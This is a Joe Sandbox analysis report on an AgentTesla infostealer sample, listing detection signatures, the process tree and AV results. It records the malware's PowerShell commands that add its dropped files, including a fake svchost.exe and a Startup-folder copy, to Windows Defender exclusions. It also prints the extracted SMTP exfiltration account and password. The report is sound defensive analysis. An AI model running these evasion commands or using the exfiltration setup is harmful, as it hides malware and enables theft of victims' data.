Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report lKJbVguaav

Overview

General Information

Sample Name:lKJbVguaav (renamed file extension from none to exe)
Analysis ID:483912
MD5:5f377de371a8e95acec9956303d6f032
SHA1:4d36d918df8ff90c0327ef713cfa262591d93636
SHA256:46eeda891d1ab66cb14c007a901cf167b9e80ed78d9af21889eea4be3eb55e09
Tags:AfiaWaveEnterprisesOyAgentTeslaexesigned
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected AntiVM3
Found malware configuration
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Sigma detected: Powershell adding suspicious path to exclusion list
Drops PE files to the startup folder
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Drops PE files with benign system names
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Launches processes in debugging mode, may be used to hinder debugging
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Creates files inside the system directory
Found potential string decryption / allocating functions
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Contains capabilities to detect virtual machines
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • lKJbVguaav.exe (PID: 6396 cmdline: 'C:\Users\user\Desktop\lKJbVguaav.exe' MD5: 5F377DE371A8E95ACEC9956303D6F032)
    • AdvancedRun.exe (PID: 6924 cmdline: 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 7164 cmdline: 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /SpecialRun 4101d8 6924 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2616 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2952 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • AdvancedRun.exe (PID: 1552 cmdline: 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /SpecialRun 4101d8 3712 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 3020 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6192 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 668 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 7ADA33B7.exe (PID: 6536 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' MD5: 5F377DE371A8E95ACEC9956303D6F032)
      • AdvancedRun.exe (PID: 3712 cmdline: 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • powershell.exe (PID: 5256 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5008 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 3136 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6640 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 3976 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6992 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6668 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6820 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • lKJbVguaav.exe (PID: 1560 cmdline: C:\Users\user\Desktop\lKJbVguaav.exe MD5: 5F377DE371A8E95ACEC9956303D6F032)
    • WerFault.exe (PID: 3352 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 1860 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6676 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6816 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6892 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6948 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7056 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7128 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6036 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6232 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 7ADA33B7.exe (PID: 4256 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' MD5: 5F377DE371A8E95ACEC9956303D6F032)
    • AdvancedRun.exe (PID: 2540 cmdline: 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6788 cmdline: 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /SpecialRun 4101d8 2540 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 3108 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4840 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6164 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5968 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6660 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5728 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5764 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6396 -ip 6396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6088 cmdline: 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' MD5: 5F377DE371A8E95ACEC9956303D6F032)
    • AdvancedRun.exe (PID: 5616 cmdline: 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 1264 cmdline: 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /SpecialRun 4101d8 5616 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6432 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6188 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5736 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2456 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6760 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5000 cmdline: MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5168 cmdline: 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' MD5: 5F377DE371A8E95ACEC9956303D6F032)
    • AdvancedRun.exe (PID: 2028 cmdline: 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6636 cmdline: 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /SpecialRun 4101d8 2028 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 1260 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1264 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • powershell.exe (PID: 4144 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6148 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4864 cmdline: MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3084 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • svchost.exe (PID: 5292 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2272 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "mailjege@yandex.com", "Password": "recovery111", "Host": "smtp.yandex.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000000.412278595.00000000040B0000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000000.412278595.00000000040B0000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000000.424024151.00000000056F0000.00000004.00020000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000000.00000000.424024151.00000000056F0000.00000004.00020000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000000.00000000.413222827.0000000004128000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.lKJbVguaav.exe.40e7fb8.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.0.lKJbVguaav.exe.40e7fb8.5.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.0.lKJbVguaav.exe.4297e30.10.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  0.0.lKJbVguaav.exe.4297e30.10.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    0.0.lKJbVguaav.exe.40c7f98.6.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 17 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\lKJbVguaav.exe' , ParentImage: C:\Users\user\Desktop\lKJbVguaav.exe, ParentProcessId: 6396, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force, ProcessId: 2616
                      Sigma detected: Conhost Parent Process ExecutionsShow sources
                      Source: Process startedAuthor: omkar72: Data: Command: 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /SpecialRun 4101d8 3712, CommandLine: 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /SpecialRun 4101d8 3712, CommandLine|base64offset|contains: *^r&F, Image: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 3712, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /SpecialRun 4101d8 3712, ProcessId: 1552
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\lKJbVguaav.exe' , ParentImage: C:\Users\user\Desktop\lKJbVguaav.exe, ParentProcessId: 6396, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force, ProcessId: 2616
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132762210987412659.2616.DefaultAppDomain.powershell

                      Malware Analysis System Evasion:

                      barindex
                      Sigma detected: Powershell adding suspicious path to exclusion listShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\lKJbVguaav.exe' , ParentImage: C:\Users\user\Desktop\lKJbVguaav.exe, ParentProcessId: 6396, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force, ProcessId: 3020

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.0.lKJbVguaav.exe.40e7fb8.5.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "mailjege@yandex.com", "Password": "recovery111", "Host": "smtp.yandex.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: lKJbVguaav.exeVirustotal: Detection: 61%Perma Link
                      Source: lKJbVguaav.exeMetadefender: Detection: 34%Perma Link
                      Source: lKJbVguaav.exeReversingLabs: Detection: 66%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeVirustotal: Detection: 61%Perma Link
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeReversingLabs: Detection: 66%
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeReversingLabs: Detection: 66%
                      Machine Learning detection for sampleShow sources
                      Source: lKJbVguaav.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
